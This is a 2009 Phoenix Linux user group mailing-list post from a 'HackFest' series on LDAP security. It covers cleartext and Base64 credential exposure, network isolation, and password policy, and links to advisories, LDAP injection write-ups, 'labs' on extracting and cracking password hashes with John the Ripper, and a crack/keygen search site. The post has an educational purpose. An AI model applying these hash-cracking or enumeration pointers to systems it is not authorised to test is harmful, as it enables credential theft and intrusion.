[PLUG-Devel] HackFest Series: LDAP

Lisa Kachold lisakachold at obnosis.com
Fri Jan 2 10:34:58 MST 2009 

LDAP, RFC 4513 has some security issues.  In any security model, we mitigate possible problems with layered technology.
RFC:  http://www.rfc-editor.org/rfc/rfc4513.txt

PCI Compliance and LDAP Security:
The best way to mitigate LDAP  network issues, is through PCI compliance or isolated server network engineering, completing the model with  VLAN or switch network isolation where possible packet interception might occur, since passwords and packets are sent either in clear text or encoded using Base64 encoding,  which can be trivially intercepted.

http://www.faqs.org/ftp/pub/internet-drafts/draft-behera-ldap-password-policy-09.txt

Extract from the draft's abstract:
"..In order to improve the security of LDAP directories and make it difficult for password cracking programs to break into directories, it is desirable to enforce a set of rules on password usage. These rules are made to ensure that users change their passwords periodically, passwords meet construction requirements, the re-use of old password is restricted, and users are locked out after a certain number of failed attempts."

Network or "bottom up" OSI Security:
With such a concentration of data in the directory, network security becomes very important. Anyone who could modify the data could give themselves access to vast numbers of machines at a stroke. Some data needs to be protected from unauthorized viewing: although all passwords are hashed, anyone who can read the hashes can mount a dictionary attack.

Network Mitigation:
The layer that, in the final analysis, protects LDAP from shared network based attacks, is layer 8 - Human Trust.  I.E. no professional on your network is expected to be so ill-intentioned or fool hardy to mis-use trust.  At some point - all of us are dangerous and unstoppable, it's expected we have bigger games to play than exploit trust?

OSI Application Layer or Top Down:
More subtly, anyone who can hijack a client-server connection can feed bogus data to an individual client, or use the client's privileges to modify server data. All these things can be protected against, and LDAP now has most of the tools needed to do it.

Perl Mod Recommendations:
http://search.cpan.org/~gbarr/perl-ldap/lib/Net/LDAP/Security.pod

J2EE:
http://www.theserverside.com/tt/articles/article.tss?l=LDAP

MSDN LDAP:
http://msdn.microsoft.com/en-us/library/aa913688.aspx

Exploits:  Always check your VERSIONS and mitigate or patch any known issues!

April 2008 Cisco ASA/PIX LDAP hole:  http://www.cisco.com/en/US/products/products_security_advisory09186a0080833166.shtml

Web Injection Attacks: http://www.webappsec.org/projects/threat/classes/ldap_injection.shtml

LDAP Server Information Disclosure Vulnerability: http://www.google.com/url?q=http://www.lifedork.com/ldapuserenum-active-directory-ldap-server-information-disclosure-vulnerability.html&sa=X&oi=revisions_result&resnum=1&ct=result&cd=1&usg=AFQjCNFKLxYW4m5tri9_rhSuDCvHAZPyTA

PHP LDAP:
http://www.securitytutorials3.thetazzone.com/owasp.html

Hackin9 gives us examples:
http://blog.security4all.be/2008/04/hakin9-magazine-3rd-edition-2008-ldap.html

The proof is in the practice - Labs:

Extracting hashes with crypt/John:  http://marc.info/?l=john-users&m=120270251402411&w=2

Using John: http://www.openwall.com/lists/john-users/2005/09/17/1

Tools: 
http://www.crackserialkeygen.us/search/ldap+crack

Disclaimer: At no time have we compared simple SMTP, SSH, HTTP auth or AD LDAP or mail password security, or analyzed any other security risks as comparisons.  Intention is to educate.  Each Nix user must understand the risks before implementing any protocol.  LDAP can make your network more secure when properly implemented.

www.Obnosis.com |  http://en.wiktionary.org/wiki/Citations:obnosis |  (503)754-4452
January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security Forensics @ UAT 1/10/09 12-3PM


_________________________________________________________________
Send e-mail anywhere. No map, no compass.
http://windowslive.com/oneline/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_anywhere_122008
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.PLUG.phoenix.az.us/pipermail/plug-devel/attachments/20090102/5ad2c8bc/attachment.htm

More information about the PLUG-devel mailing list